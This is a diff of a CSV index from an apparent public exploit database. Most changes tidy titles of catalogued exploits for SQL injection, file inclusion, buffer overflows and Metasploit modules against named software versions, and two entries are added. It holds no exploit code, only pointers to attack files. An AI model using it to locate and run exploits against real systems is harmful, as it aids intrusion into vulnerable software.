6319,platforms/windows/dos/6319.html,"Ultra Office - ActiveX Control Arbitrary File Corruption Exploit",2008-08-27,shinnai,windows,dos,0 6326,platforms/windows/dos/6326.html,"LogMeIn Remote Access Utility - ActiveX Memory Corruption (Denial of Service)",2008-08-29,"YAG KOHHA",windows,dos,0 @@ -1315,7 +1315,7 @@ id,file,description,date,author,platform,type,port 10960,platforms/multiple/dos/10960.pl,"Google Chrome 4.0.249.30 - Denial of Service (PoC)",2010-01-03,anonymous,multiple,dos,0 11009,platforms/multiple/dos/11009.pl,"Novell Netware - CIFS And AFP Remote Memory Consumption Denial of Service",2010-01-05,"Francis Provencher",multiple,dos,0 11020,platforms/windows/dos/11020.pl,"GOM Audio - Local Crash (PoC)",2010-01-06,applicationlayer,windows,dos,0 -11021,platforms/windows/dos/11021.txt,"Flashget 3.x - IEHelper Remote Exec (PoC)",2010-01-06,superli,windows,dos,0 +11021,platforms/windows/dos/11021.txt,"FlashGet 3.x - IEHelper Remote Exec (PoC)",2010-01-06,superli,windows,dos,0 11034,platforms/windows/dos/11034.txt,"Microsoft HTML Help Compiler (hhc.exe) - Buffer Overflow (PoC)",2010-01-06,s4squatch,windows,dos,0 11043,platforms/hardware/dos/11043.txt,"Total MultiMedia Features - Denial of Service PoC for Sony Ericsson Phones",2010-01-06,Aodrulez,hardware,dos,0 11044,platforms/linux/dos/11044.txt,"Gnome Panel 2.28.0 - Denial of Service (PoC)",2010-01-06,"Pietro Oliva",linux,dos,0 @@ -1652,7 +1652,7 @@ id,file,description,date,author,platform,type,port 14593,platforms/windows/dos/14593.htm,"AoAAudioExtractor 2.0.0.0 - ActiveX PoC (SEH)",2010-08-09,s-dz,windows,dos,0 14594,platforms/linux/dos/14594.py,"Linux Kernel 2.6.33.3 - SCTP INIT Remote Denial of Service",2010-08-09,"Jon Oberheide",linux,dos,0 14597,platforms/windows/dos/14597.py,"Mthree Development MP3 to WAV Decoder - Denial of Service",2010-08-10,"Oh Yaw Theng",windows,dos,0 -14601,platforms/windows/dos/14601.py,"Rosoft media player 4.4.4 - Buffer Overflow (SEH) (PoC)",2010-08-10,anonymous,windows,dos,0 +14601,platforms/windows/dos/14601.py,"Rosoft Media Player 4.4.4 - Buffer Overflow (SEH) (PoC)",2010-08-10,anonymous,windows,dos,0 14607,platforms/windows/dos/14607.py,"Microsoft - SMB Server Trans2 Zero Size Pool Alloc (MS10-054)",2010-08-10,"laurent gaffie",windows,dos,0 14608,platforms/windows/dos/14608.txt,"Microsoft Windows - CreateWindow Function Callback (MS10-048)",2010-08-10,"Core Security",windows,dos,0 14609,platforms/windows/dos/14609.py,"Microsoft Msxml2.XMLHTTP.3.0 - Response Handling Memory Corruption (MS10-051)",2010-08-10,Skylined,windows,dos,0 @@ -5319,6 +5319,8 @@ id,file,description,date,author,platform,type,port 40933,platforms/windows/dos/40933.svg,"Microsoft Internet Explorer 9 - IEFRAME CMarkup­Pointer::Move­To­Gap Use-After-Free",2016-12-16,Skylined,windows,dos,0 40935,platforms/windows/dos/40935.html,"Microsoft Internet Explorer 9 - IEFRAME CView::Ensure­Size Use-After-Free (MS13-021)",2016-12-16,Skylined,windows,dos,0 40944,platforms/multiple/dos/40944.py,"Google Chrome < 31.0.1650.48 - HTTP 1xx base::String­Tokenizer­T<...>::Quick­Get­Next Out-of-Bounds Read",2016-12-19,Skylined,multiple,dos,0 +40945,platforms/android/dos/40945.txt,"Google Android - WifiNative::setHotlist Stack Overflow",2016-12-20,"Google Security Research",android,dos,0 +40946,platforms/windows/dos/40946.html,"Microsoft Internet Explorer 11 MSHTML - CSplice­Tree­Engine::Remove­Splice Use-After-Free (MS14-035)",2016-12-20,Skylined,windows,dos,0 3,platforms/linux/local/3.c,"Linux Kernel 2.2.x / 2.4.x (RedHat) - 'ptrace/kmod' Privilege Escalation",2003-03-30,"Wojciech Purczynski",linux,local,0 4,platforms/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Buffer Overflow",2003-04-01,Andi,solaris,local,0 12,platforms/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,linux,local,0 @@ -9720,8 +9722,8 @@ id,file,description,date,author,platform,type,port 6229,platforms/multiple/remote/6229.txt,"Apache Tomcat < 6.0.18 - utf8 Directory Traversal (1)",2008-08-11,"Simon Ryeo",multiple,remote,0 6236,platforms/multiple/remote/6236.txt,"BIND 9.5.0-P2 - (randomized ports) Remote DNS Cache Poisoning Exploit",2008-08-13,Zbr,multiple,remote,0 6238,platforms/windows/remote/6238.c,"IntelliTamper 2.07/2.08 Beta 4 - A HREF Remote Buffer Overflow",2008-08-13,kralor,windows,remote,0 -6248,platforms/windows/remote/6248.pl,"FlashGet 1.9.0.1012 - (FTP PWD Response) SEH STACK Overflow",2008-08-15,SkOd,windows,remote,21 -6256,platforms/windows/remote/6256.pl,"FlashGet 1.9.0.1012 - (FTP PWD Response) Buffer Overflow (SafeSEH)",2008-08-17,"Guido Landi",windows,remote,0 +6248,platforms/windows/remote/6248.pl,"FlashGet 1.9.0.1012 - 'FTP PWD Response' SEH STACK Overflow",2008-08-15,SkOd,windows,remote,21 +6256,platforms/windows/remote/6256.pl,"FlashGet 1.9.0.1012 - 'FTP PWD Response' Buffer Overflow (SafeSEH)",2008-08-17,"Guido Landi",windows,remote,0 6278,platforms/windows/remote/6278.txt,"Anzio Web Print Object 3.2.30 - ActiveX Buffer Overflow",2008-08-20,"Core Security",windows,remote,0 6302,platforms/windows/remote/6302.pl,"Dana IRC 1.4a - Remote Buffer Overflow",2008-08-25,"Guido Landi",windows,remote,0 6305,platforms/hardware/remote/6305.htm,"Belkin Wireless G router + ADSL2 modem - Authentication Bypass",2008-08-25,noensr,hardware,remote,0 @@ -12653,7 +12655,7 @@ id,file,description,date,author,platform,type,port 23071,platforms/multiple/remote/23071.txt,"SAP Internet Transaction Server 4620.2.0.323011 Build 46B.323011 - Cross-Site Scripting",2003-08-30,"Martin Eiszner",multiple,remote,0 23073,platforms/windows/remote/23073.txt,"MySQL 5.1/5.5 (Windows) - 'MySQLJackpot' Remote Command Execution",2012-12-02,kingcope,windows,remote,0 23074,platforms/windows/remote/23074.txt,"IBM System Director Agent - Remote System Level Exploit",2012-12-02,kingcope,windows,remote,0 -23079,platforms/windows/remote/23079.txt,"freeFTPd - Remote Authentication Bypass",2012-12-02,kingcope,windows,remote,0 +23079,platforms/windows/remote/23079.txt,"freeFTPd 1.2.6 - Remote Authentication Bypass",2012-12-02,kingcope,windows,remote,0 23080,platforms/windows/remote/23080.txt,"freeSSHd 2.1.3 - Remote Authentication Bypass",2012-12-02,kingcope,windows,remote,0 23081,platforms/multiple/remote/23081.pl,"MySQL - Remote Unauthenticated User Enumeration",2012-12-02,kingcope,multiple,remote,0 23082,platforms/linux/remote/23082.txt,"(SSH.com Communications) SSH Tectia (SSH < 2.0-6.1.9.95 / Tectia 6.1.9.95) - Authentication Bypass Remote Exploit",2012-12-02,kingcope,linux,remote,0 @@ -13501,7 +13503,7 @@ id,file,description,date,author,platform,type,port 28082,platforms/windows/remote/28082.rb,"Microsoft Internet Explorer - CFlatMarkupPointer Use-After-Free (MS13-059) (Metasploit)",2013-09-04,Metasploit,windows,remote,0 28083,platforms/windows/remote/28083.rb,"HP LoadRunner - lrFileIOService ActiveX WriteFileString Remote Code Execution (Metasploit)",2013-09-04,Metasploit,windows,remote,0 28118,platforms/windows/remote/28118.html,"Microsoft Internet Explorer 5.0.1 - OuterHTML redirection Handling Information Disclosure",2006-06-27,"Plebo Aesdi Nael",windows,remote,0 -28170,platforms/windows/remote/28170.rb,"freeFTPd 1.0.10 - 'PASS' SEH Overflow (Metasploit)",2013-09-09,"Muhamad Fadzil Ramli",windows,remote,21 +28170,platforms/windows/remote/28170.rb,"freeFTPd 1.0.10 - 'PASS' SEH Buffer Overflow (Metasploit)",2013-09-09,"Muhamad Fadzil Ramli",windows,remote,21 28181,platforms/linux/remote/28181.c,"AdPlug 2.0 - Multiple Remote File Buffer Overflow Vulnerabilities",2006-07-06,"Luigi Auriemma",linux,remote,0 28183,platforms/windows/remote/28183.py,"eM Client e-mail client 5.0.18025.0 - Persistent Cross-Site Scripting",2013-09-10,loneferret,windows,remote,0 28186,platforms/windows/remote/28186.c,"Kaillera 0.86 - Message Buffer Overflow",2006-07-06,"Luigi Auriemma",windows,remote,0 @@ -13561,7 +13563,7 @@ id,file,description,date,author,platform,type,port 28642,platforms/windows/remote/28642.txt,"CA eSCC r8/1.0 / eTrust Audit r8/1.5 - Audit Event System Unspecified Replay Attack",2006-09-21,"Patrick Webster",windows,remote,0 28643,platforms/osx/remote/28643.txt,"Apple Mac OSX 10.x - AirPort Wireless Driver Multiple Buffer Overflow Vulnerabilities",2006-09-21,"David Maynor",osx,remote,0 28725,platforms/multiple/remote/28725.txt,"SAP Internet Transaction Server 6.10/6.20 - Cross-Site Scripting",2006-09-28,"ILION Research",multiple,remote,0 -28681,platforms/windows/remote/28681.rb,"freeFTPd - 'PASS' Buffer Overflow (Metasploit)",2013-10-02,Metasploit,windows,remote,21 +28681,platforms/windows/remote/28681.rb,"freeFTPd 1.0.10 - 'PASS' Buffer Overflow (Metasploit)",2013-10-02,Metasploit,windows,remote,21 28682,platforms/windows/remote/28682.rb,"Micorosft Internet Explorer - SetMouseCapture Use-After-Free (Metasploit)",2013-10-02,Metasploit,windows,remote,0 28710,platforms/osx/remote/28710.txt,"Skype Technologies Skype 1.5 - NSRunAlertPanel Remote Format String",2006-09-26,"Tom Ferris",osx,remote,0 28713,platforms/php/remote/28713.php,"Apache Tomcat/JBoss EJBInvokerServlet / JMXInvokerServlet (RMI over HTTP) Marshalled Object - Remote Code Execution",2013-10-04,rgod,php,remote,0 @@ -16510,8 +16512,8 @@ id,file,description,date,author,platform,type,port 2256,platforms/php/webapps/2256.txt,"Integramod Portal 2.0 rc2 - 'phpbb_root_path' Remote File Inclusion",2006-08-25,MATASANOS,php,webapps,0 2257,platforms/php/webapps/2257.txt,"CliServ Web Community 0.65 - (cl_headers) Include",2006-08-25,Kacper,php,webapps,0 2259,platforms/php/webapps/2259.txt,"ProManager 0.73 - 'note.php' SQL Injection",2006-08-26,Kacper,php,webapps,0 -2260,platforms/php/webapps/2260.pl,"AlberT-EasySite 1.0a5 - (PSA_PATH) Remote File Inclusion",2006-08-27,Kacper,php,webapps,0 -2261,platforms/php/webapps/2261.php,"iziContents RC6 - GLOBALS[] Remote Code Execution",2006-08-27,Kacper,php,webapps,0 +2260,platforms/php/webapps/2260.pl,"AlberT-EasySite 1.0a5 - 'PSA_PATH' Parameter Remote File Inclusion",2006-08-27,Kacper,php,webapps,0 +2261,platforms/php/webapps/2261.php,"iziContents RC6 - Remote Code Execution",2006-08-27,Kacper,php,webapps,0 2262,platforms/php/webapps/2262.php,"CMS Frogss 0.4 - (podpis) SQL Injection",2006-08-27,Kacper,php,webapps,0 2263,platforms/php/webapps/2263.txt,"Ay System CMS 2.6 - 'main.php' Remote File Inclusion",2006-08-27,SHiKaA,php,webapps,0 2266,platforms/cgi/webapps/2266.txt,"Cybozu Products - 'id' Arbitrary File Retrieval",2006-08-28,"Tan Chew Keong",cgi,webapps,0 @@ -17528,7 +17530,7 @@ id,file,description,date,author,platform,type,port 3744,platforms/php/webapps/3744.txt,"audioCMS arash 0.1.4 - (arashlib_dir) Remote File Inclusion",2007-04-15,GoLd_M,php,webapps,0 3745,platforms/php/webapps/3745.txt,"Web Slider 0.6 - 'path' Parameter Remote File Inclusion",2007-04-15,GoLd_M,php,webapps,0 3747,platforms/php/webapps/3747.txt,"openMairie 1.10 - (scr/soustab.php) Local File Inclusion",2007-04-16,GoLd_M,php,webapps,0 -3748,platforms/php/webapps/3748.txt,"SunShop Shopping Cart 3.5 - 'abs_path' Remote File Inclusion",2007-04-16,irvian,php,webapps,0 +3748,platforms/php/webapps/3748.txt,"SunShop Shopping Cart 3.5 - 'abs_path' Parameter Remote File Inclusion",2007-04-16,irvian,php,webapps,0 3749,platforms/php/webapps/3749.txt,"StoreFront for Gallery - (GALLERY_BASEDIR) Remote File Inclusion",2007-04-16,"Alkomandoz Hacker",php,webapps,0 3750,platforms/php/webapps/3750.txt,"xoops module tsdisplay4xoops 0.1 - Remote File Inclusion",2007-04-16,GoLd_M,php,webapps,0 3751,platforms/php/webapps/3751.txt,"Anthologia 0.5.2 - (index.php ads_file) Remote File Inclusion",2007-04-17,Dj7xpl,php,webapps,0 @@ -17850,7 +17852,7 @@ id,file,description,date,author,platform,type,port 4308,platforms/php/webapps/4308.txt,"Joomla! Component Nice Talk 0.9.3 - (tagid) SQL Injection",2007-08-23,ajann,php,webapps,0 4309,platforms/php/webapps/4309.txt,"Joomla! Component EventList 0.8 - (did) SQL Injection",2007-08-23,ajann,php,webapps,0 4310,platforms/php/webapps/4310.txt,"Joomla! Component BibTeX 1.3 - Blind SQL Injection",2007-08-23,ajann,php,webapps,0 -4313,platforms/php/webapps/4313.pl,"SunShop 4.0 RC 6 - 'Search' Blind SQL Injection",2007-08-25,k1tk4t,php,webapps,0 +4313,platforms/php/webapps/4313.pl,"SunShop Shopping Cart 4.0 RC 6 - 'Search' Blind SQL Injection",2007-08-25,k1tk4t,php,webapps,0 4317,platforms/php/webapps/4317.txt,"2532/Gigs 1.2.1 - 'activateuser.php' Local File Inclusion",2007-08-26,bd0rk,php,webapps,0 4320,platforms/php/webapps/4320.txt,"SomeryC 0.2.4 - (include.php skindir) Remote File Inclusion",2007-08-27,Katatafish,php,webapps,0 4326,platforms/php/webapps/4326.txt,"Arcadem 2.01 - SQL Injection / Remote File Inclusion",2007-08-27,SmOk3,php,webapps,0 @@ -17923,7 +17925,7 @@ id,file,description,date,author,platform,type,port 4436,platforms/php/webapps/4436.pl,"Flip 3.0 - Remote Password Hash Disclosure",2007-09-20,undefined1_,php,webapps,0 4439,platforms/php/webapps/4439.txt,"neuron news 1.0 - (index.php q) Local File Inclusion",2007-09-21,Dj7xpl,php,webapps,0 4440,platforms/php/webapps/4440.txt,"Joomla! Component com_slideshow - Remote File Inclusion",2007-09-21,ShockShadow,php,webapps,0 -4441,platforms/php/webapps/4441.txt,"izicontents rc6 - (Remote File Inclusion / Local File Inclusion) Multiple Vulnerabilities",2007-09-21,irk4z,php,webapps,0 +4441,platforms/php/webapps/4441.txt,"iziContents rc6 - Remote File Inclusion / Local File Inclusion",2007-09-21,irk4z,php,webapps,0 4442,platforms/php/webapps/4442.txt,"CMS Made Simple 1.2 - Remote Code Execution",2007-09-21,irk4z,php,webapps,0 4443,platforms/php/webapps/4443.txt,"ClanSphere 2007.4 - 'cat_id' SQL Injection",2007-09-22,IHTeam,php,webapps,0 4444,platforms/php/webapps/4444.txt,"Black Lily 2007 - 'products.php class' SQL Injection",2007-09-22,VerY-SecReT,php,webapps,0 @@ -19295,59 +19297,59 @@ id,file,description,date,author,platform,type,port 6232,platforms/php/webapps/6232.txt,"Ovidentia 6.6.5 - 'item' Parameter SQL Injection",2008-08-11,"Khashayar Fereidani",php,webapps,0 6233,platforms/php/webapps/6233.txt,"BBlog 0.7.6 - 'mod' Parameter SQL Injection",2008-08-12,IP-Sh0k,php,webapps,0 6234,platforms/php/webapps/6234.txt,"Joomla! 1.5.x - (Token) Remote Admin Change Password",2008-08-12,d3m0n,php,webapps,0 -6235,platforms/php/webapps/6235.txt,"gelato CMS 0.95 - (img) Remote File Disclosure",2008-08-13,JIKO,php,webapps,0 -6247,platforms/php/webapps/6247.txt,"dotCMS 1.6 - 'id' Multiple Local File Inclusion",2008-08-15,Don,php,webapps,0 -6249,platforms/php/webapps/6249.txt,"ZeeJobsite 2.0 - (adid) SQL Injection",2008-08-15,"Hussin X",php,webapps,0 +6235,platforms/php/webapps/6235.txt,"gelato CMS 0.95 - 'img' Parameter Remote File Disclosure",2008-08-13,JIKO,php,webapps,0 +6247,platforms/php/webapps/6247.txt,"dotCMS 1.6 - 'id' Parameter Local File Inclusion",2008-08-15,Don,php,webapps,0 +6249,platforms/php/webapps/6249.txt,"Zeeways ZeeJobsite 2.0 - 'adid' Parameter SQL Injection",2008-08-15,"Hussin X",php,webapps,0 6250,platforms/php/webapps/6250.txt,"deeemm CMS (dmcms) 0.7.4 - Multiple Vulnerabilities",2008-08-15,"Khashayar Fereidani",php,webapps,0 -6254,platforms/php/webapps/6254.txt,"XNova 0.8 sp1 - (xnova_root_path) Remote File Inclusion",2008-08-17,NuclearHaxor,php,webapps,0 +6254,platforms/php/webapps/6254.txt,"XNova 0.8 sp1 - 'xnova_root_path' Parameter Remote File Inclusion",2008-08-17,NuclearHaxor,php,webapps,0 6255,platforms/php/webapps/6255.txt,"phpArcadeScript 4 - 'cat' Parameter SQL Injection",2008-08-17,"Hussin X",php,webapps,0 -6258,platforms/php/webapps/6258.txt,"PHPBasket - 'product.php pro_id' SQL Injection",2008-08-17,r45c4l,php,webapps,0 +6258,platforms/php/webapps/6258.txt,"PHPBasket - 'pro_id' Parameter SQL Injection",2008-08-17,r45c4l,php,webapps,0 6259,platforms/php/webapps/6259.txt,"VidiScript (Avatar) - Arbitrary File Upload",2008-08-18,InjEctOr5,php,webapps,0 6260,platforms/php/webapps/6260.txt,"cyberBB 0.6 - Multiple SQL Injections",2008-08-18,cOndemned,php,webapps,0 6261,platforms/php/webapps/6261.txt,"PHP live helper 2.0.1 - Multiple Vulnerabilities",2008-08-18,"GulfTech Security",php,webapps,0 6269,platforms/cgi/webapps/6269.txt,"TWiki 4.2.0 - (configure) Remote File Disclosure",2008-08-19,Th1nk3r,cgi,webapps,0 6270,platforms/php/webapps/6270.txt,"Affiliate Directory - 'id' Parameter SQL Injection",2008-08-19,"Hussin X",php,webapps,0 -6271,platforms/php/webapps/6271.txt,"Ad Board - 'id' SQL Injection",2008-08-19,"Hussin X",php,webapps,0 -6273,platforms/php/webapps/6273.txt,"SunShop 4.1.4 - 'id' SQL Injection",2008-08-19,"GulfTech Security",php,webapps,0 -6276,platforms/php/webapps/6276.txt,"Banner Management Script - 'tr.php id' SQL Injection",2008-08-19,S.W.A.T.,php,webapps,0 +6271,platforms/php/webapps/6271.txt,"Ad Board - 'id' Parameter SQL Injection",2008-08-19,"Hussin X",php,webapps,0 +6273,platforms/php/webapps/6273.txt,"SunShop Shopping Cart 4.1.4 - 'id' Parameter SQL Injection",2008-08-19,"GulfTech Security",php,webapps,0 +6276,platforms/php/webapps/6276.txt,"Banner Management Script - 'id' Parameter SQL Injection",2008-08-19,S.W.A.T.,php,webapps,0 6277,platforms/php/webapps/6277.txt,"Active PHP BookMarks 1.1.02 - SQL Injection",2008-08-19,"Hussin X",php,webapps,0 6279,platforms/php/webapps/6279.pl,"Pars4U Videosharing 1.0 - Cross-Site Scripting / Blind SQL Injection",2008-08-20,Mr.SQL,php,webapps,0 -6280,platforms/php/webapps/6280.txt,"phpBazar 2.0.2 - (adid) SQL Injection",2008-08-20,e.wiZz!,php,webapps,0 -6281,platforms/php/webapps/6281.pl,"webEdition CMS - (we_objectID) Blind SQL Injection",2008-08-20,Lidloses_Auge,php,webapps,0 -6284,platforms/php/webapps/6284.txt,"CustomCMS 4.0 - (CCMS) print.php SQL Injection",2008-08-21,~!Dok_tOR!~,php,webapps,0 +6280,platforms/php/webapps/6280.txt,"phpBazar 2.0.2 - 'adid' Parameter SQL Injection",2008-08-20,e.wiZz!,php,webapps,0 +6281,platforms/php/webapps/6281.pl,"webEdition CMS - 'we_objectID' Parameter Blind SQL Injection",2008-08-20,Lidloses_Auge,php,webapps,0 +6284,platforms/php/webapps/6284.txt,"CustomCMS 4.0 - 'print.php' SQL Injection",2008-08-21,~!Dok_tOR!~,php,webapps,0 6285,platforms/php/webapps/6285.txt,"Photocart 3.9 - Multiple SQL Injections",2008-08-21,~!Dok_tOR!~,php,webapps,0 6286,platforms/php/webapps/6286.txt,"BandSite CMS 1.1.4 - Download Backup / Cross-Site Scripting / Cross-Site Request Forgery",2008-08-21,SirGod,php,webapps,0 -6287,platforms/php/webapps/6287.txt,"TinyCMS 1.1.2 - (templater.php) Local File Inclusion",2008-08-21,cOndemned,php,webapps,0 +6287,platforms/php/webapps/6287.txt,"TinyCMS 1.1.2 - 'templater.php' Local File Inclusion",2008-08-21,cOndemned,php,webapps,0 6288,platforms/php/webapps/6288.txt,"easysite 2.3 - Multiple Vulnerabilities",2008-08-21,SirGod,php,webapps,0 6291,platforms/php/webapps/6291.txt,"noname script 1.1 - Multiple Vulnerabilities",2008-08-23,SirGod,php,webapps,0 -6292,platforms/php/webapps/6292.txt,"onenews Beta 2 - (Cross-Site Scripting / HTML Injection / SQL Injection) Multiple Vulnerabilities",2008-08-23,suN8Hclf,php,webapps,0 -6294,platforms/php/webapps/6294.txt,"5 star review - (Cross-Site Scripting / SQL Injection) Multiple Vulnerabilities",2008-08-24,Mr.SQL,php,webapps,0 +6292,platforms/php/webapps/6292.txt,"onenews Beta 2 - Cross-Site Scripting / HTML Injection / SQL Injection",2008-08-23,suN8Hclf,php,webapps,0 +6294,platforms/php/webapps/6294.txt,"5 star review - Cross-Site Scripting / SQL Injection",2008-08-24,Mr.SQL,php,webapps,0 6295,platforms/php/webapps/6295.txt,"MiaCMS 4.6.5 - Multiple SQL Injections",2008-08-24,~!Dok_tOR!~,php,webapps,0 6296,platforms/php/webapps/6296.txt,"BtiTracker 1.4.7 / xbtit 2.0.542 - SQL Injection",2008-08-25,InATeam,php,webapps,0 6297,platforms/php/webapps/6297.txt,"Matterdaddy Market 1.1 - Multiple SQL Injections (1)",2008-08-25,~!Dok_tOR!~,php,webapps,0 -6298,platforms/php/webapps/6298.txt,"Web Directory Script 2.0 - (name) SQL Injection",2008-08-25,~!Dok_tOR!~,php,webapps,0 +6298,platforms/php/webapps/6298.txt,"Web Directory Script 2.0 - 'name' Parameter SQL Injection",2008-08-25,~!Dok_tOR!~,php,webapps,0 6300,platforms/php/webapps/6300.txt,"Pluck CMS 4.5.2 - Multiple Local File Inclusion",2008-08-25,DSecRG,php,webapps,0 6301,platforms/php/webapps/6301.txt,"EZContents CMS 2.0.3 - Multiple Local File Inclusion",2008-08-25,DSecRG,php,webapps,0 6303,platforms/php/webapps/6303.txt,"WebBoard 2.0 - Arbitrary SQL Question/Anwser Delete",2008-08-25,t0pP8uZz,php,webapps,0 6306,platforms/php/webapps/6306.pl,"GeekLog 1.5.0 - Arbitrary File Upload",2008-08-25,t0pP8uZz,php,webapps,0 -6307,platforms/php/webapps/6307.txt,"Crafty Syntax Live Help 2.14.6 - (department) SQL Injection",2008-08-25,"GulfTech Security",php,webapps,0 +6307,platforms/php/webapps/6307.txt,"Crafty Syntax Live Help 2.14.6 - 'department' Parameter SQL Injection",2008-08-25,"GulfTech Security",php,webapps,0 6309,platforms/php/webapps/6309.txt,"z-breaknews 2.0 - 'single.php' SQL Injection",2008-08-26,cOndemned,php,webapps,0 6310,platforms/php/webapps/6310.txt,"Kolifa.net Download Script 1.2 - 'id' SQL Injection",2008-08-26,Kacak,php,webapps,0 6311,platforms/php/webapps/6311.php,"Simple PHP Blog (SPHPBlog) 0.5.1 - Code Execution",2008-08-26,mAXzA,php,webapps,0 -6312,platforms/php/webapps/6312.txt,"k-rate - (SQL Injection / Cross-Site Scripting) Multiple Vulnerabilities",2008-08-26,Corwin,php,webapps,0 -6313,platforms/php/webapps/6313.txt,"CMME 1.12 - (Local File Inclusion / Cross-Site Scripting / Cross-Site Request Forgery/Download Backup/Make Directory) Multiple Vulnerabilities",2008-08-26,SirGod,php,webapps,0 -6314,platforms/php/webapps/6314.txt,"Thickbox Gallery 2.0 - (Admins.php) Admin Data Disclosure",2008-08-26,SirGod,php,webapps,0 +6312,platforms/php/webapps/6312.txt,"k-rate - SQL Injection / Cross-Site Scripting",2008-08-26,Corwin,php,webapps,0 +6313,platforms/php/webapps/6313.txt,"CMME 1.12 - Local File Inclusion / Cross-Site Scripting / Cross-Site Request Forgery/Download Backup/Make Directory",2008-08-26,SirGod,php,webapps,0 +6314,platforms/php/webapps/6314.txt,"Thickbox Gallery 2.0 - 'Admins.php' Admin Data Disclosure",2008-08-26,SirGod,php,webapps,0 6315,platforms/php/webapps/6315.txt,"iFdate 2.0.3 - SQL Injection",2008-08-26,~!Dok_tOR!~,php,webapps,0 6316,platforms/php/webapps/6316.php,"MyBulletinBoard (MyBB) 1.2.11 - 'private.php' SQL Injection (2)",2008-08-26,c411k,php,webapps,0 -6320,platforms/php/webapps/6320.txt,"phpMyRealty 1.0.9 - Multiple SQL Injections",2008-08-27,~!Dok_tOR!~,php,webapps,0 +6320,platforms/php/webapps/6320.txt,"PHPMyRealty 1.0.9 - Multiple SQL Injections",2008-08-27,~!Dok_tOR!~,php,webapps,0 6321,platforms/php/webapps/6321.txt,"Yourownbux 3.1 / 3.2 Beta - SQL Injection",2008-08-27,~!Dok_tOR!~,php,webapps,0 6325,platforms/php/webapps/6325.php,"Invision Power Board 2.3.5 - Multiple Vulnerabilities (2)",2008-08-29,DarkFig,php,webapps,0 -6332,platforms/php/webapps/6332.txt,"brim 2.0.0 - (SQL Injection / Cross-Site Scripting) Multiple Vulnerabilities",2008-08-30,InjEctOr5,php,webapps,0 -6335,platforms/php/webapps/6335.txt,"Web Directory Script 1.5.3 - (site) SQL Injection",2008-08-31,"Hussin X",php,webapps,0 -6336,platforms/php/webapps/6336.txt,"Words tag script 1.2 - (word) SQL Injection",2008-08-31,"Hussin X",php,webapps,0 +6332,platforms/php/webapps/6332.txt,"Brim 2.0.0 - SQL Injection / Cross-Site Scripting",2008-08-30,InjEctOr5,php,webapps,0 +6335,platforms/php/webapps/6335.txt,"Web Directory Script 1.5.3 - 'site' Parameter SQL Injection",2008-08-31,"Hussin X",php,webapps,0 +6336,platforms/php/webapps/6336.txt,"Words tag script 1.2 - 'word' Parameter SQL Injection",2008-08-31,"Hussin X",php,webapps,0 6338,platforms/php/webapps/6338.txt,"myPHPNuke < 1.8.8_8rc2 - Cross-Site Scripting / SQL Injection",2008-08-31,MustLive,php,webapps,0 6339,platforms/php/webapps/6339.txt,"webid 0.5.4 - Multiple Vulnerabilities",2008-08-31,InjEctOr5,php,webapps,0 -6341,platforms/php/webapps/6341.txt,"WeBid 0.5.4 - (item.php id) SQL Injection",2008-09-01,Stack,php,webapps,0 +6341,platforms/php/webapps/6341.txt,"WeBid 0.5.4 - 'item.php' SQL Injection",2008-09-01,Stack,php,webapps,0 6342,platforms/php/webapps/6342.txt,"EasyClassifields 3.0 - (go) SQL Injection",2008-09-01,e.wiZz!,php,webapps,0 6343,platforms/php/webapps/6343.txt,"CMSbright - (id_rub_page) SQL Injection",2008-09-01,"BorN To K!LL",php,webapps,0 6344,platforms/php/webapps/6344.php,"WeBid 0.5.4 - 'FCKeditor' Arbitrary File Upload",2008-09-01,Stack,php,webapps,0 @@ -19913,7 +19915,7 @@ id,file,description,date,author,platform,type,port 7058,platforms/php/webapps/7058.txt,"zeeproperty 1.0 - (Arbitrary File Upload / Cross-Site Scripting) Multiple Vulnerabilities",2008-11-08,ZoRLu,php,webapps,0 7059,platforms/php/webapps/7059.txt,"Enthusiast 3.1.4 - (show_joined.php path) Remote File Inclusion",2008-11-08,BugReport.IR,php,webapps,0 7061,platforms/php/webapps/7061.txt,"V3 Chat Profiles/Dating Script 3.0.2 - (Authentication Bypass) SQL Injection",2008-11-08,d3b4g,php,webapps,0 -7062,platforms/php/webapps/7062.txt,"ZeeJobsite 2.0 - Arbitrary File Upload",2008-11-08,ZoRLu,php,webapps,0 +7062,platforms/php/webapps/7062.txt,"Zeeways ZeeJobsite 2.0 - Arbitrary File Upload",2008-11-08,ZoRLu,php,webapps,0 7063,platforms/php/webapps/7063.txt,"V3 Chat Profiles/Dating Script 3.0.2 - Insecure Cookie Handling",2008-11-08,Stack,php,webapps,0 7064,platforms/php/webapps/7064.pl,"Mambo Component n-form - 'form_id' Parameter Blind SQL Injection",2008-11-08,boom3rang,php,webapps,0 7065,platforms/php/webapps/7065.txt,"Cyberfolio 7.12.2 - 'theme' Parameter Local File Inclusion",2008-11-08,dun,php,webapps,0 @@ -20763,7 +20765,7 @@ id,file,description,date,author,platform,type,port 8304,platforms/php/webapps/8304.txt,"Arcadwy Arcade Script - (Authentication Bypass) Insecure Cookie Handling",2009-03-29,ZoRLu,php,webapps,0 8305,platforms/php/webapps/8305.txt,"iWare CMS 5.0.4 - Multiple SQL Injections",2009-03-29,boom3rang,php,webapps,0 8307,platforms/asp/webapps/8307.txt,"Diskos CMS Manager - (SQL Injection / File Disclosure/Authentication Bypass) Multiple Vulnerabilities",2009-03-30,AnGeL25dZ,asp,webapps,0 -8309,platforms/php/webapps/8309.txt,"BandSite CMS 1.1.4 - (members.php memid) SQL Injection",2009-03-30,SirGod,php,webapps,0 +8309,platforms/php/webapps/8309.txt,"BandSite CMS 1.1.4 - 'members.php' SQL Injection",2009-03-30,SirGod,php,webapps,0 8315,platforms/php/webapps/8315.txt,"gravy media CMS 1.07 - Multiple Vulnerabilities",2009-03-30,x0r,php,webapps,0 8317,platforms/php/webapps/8317.pl,"X-Forum 0.6.2 - Remote Command Execution",2009-03-30,Osirys,php,webapps,0 8318,platforms/php/webapps/8318.txt,"JobHut 1.2 - (pk) SQL Injection",2009-03-30,K-159,php,webapps,0 @@ -20893,7 +20895,7 @@ id,file,description,date,author,platform,type,port 8539,platforms/php/webapps/8539.txt,"Opencart 1.1.8 - 'route' Local File Inclusion",2009-04-27,OoN_Boy,php,webapps,0 8543,platforms/php/webapps/8543.php,"LightBlog 9.9.2 - 'register.php' Remote Code Execution",2009-04-27,EgiX,php,webapps,0 8545,platforms/php/webapps/8545.txt,"Dew-NewPHPLinks 2.0 - (Local File Inclusion / Cross-Site Scripting) Multiple 